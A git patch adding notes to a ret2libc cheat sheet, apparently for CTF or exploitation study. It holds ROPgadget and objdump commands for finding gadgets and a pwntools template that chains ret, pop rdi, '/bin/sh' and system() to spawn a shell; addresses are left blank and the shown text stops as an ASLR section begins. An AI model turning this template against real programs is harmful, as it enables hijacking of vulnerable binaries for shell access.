From 0caf7edbf632b9d13fe33a396db7f82df42bb5bd Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 3 Feb 2022 22:46:56 +0100 Subject: [PATCH] ret2libc addition --- exploit/binaries/ret2libc.md | 37 +++++++++++++++++++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md index 912b5d9..eb1ad88 100644 --- a/exploit/binaries/ret2libc.md +++ b/exploit/binaries/ret2libc.md @@ -41,7 +41,42 @@ readelf -s /lib32/libc.so.6 | grep system * Architecture * Calling convention -## Usage +### Manually + +```sh +ROPgadget --binary | grep rdi +``` +* Find `ret`s, to put in front of rdi +```sh +objdump -d | grep ret +``` + +## Example without ASLR +```python +from pwn import * + +p = process('') + +cbase = 0x +sys = cbase + +sh = cbase + +rop_rdi = +rop_ret = + +payload = b'A' * +payload += b'B' * 8 +payload += p64(rop_ret) +payload += p64(rop_rdi) +payload += p64(sh) +payload += p64(system) +payload += p64(0x0) # end payload + +p.recv() +p.sendline(payload) +p.interactive() +``` + +## Example with ASLR * Create context ```python #!/usr/bin/env python3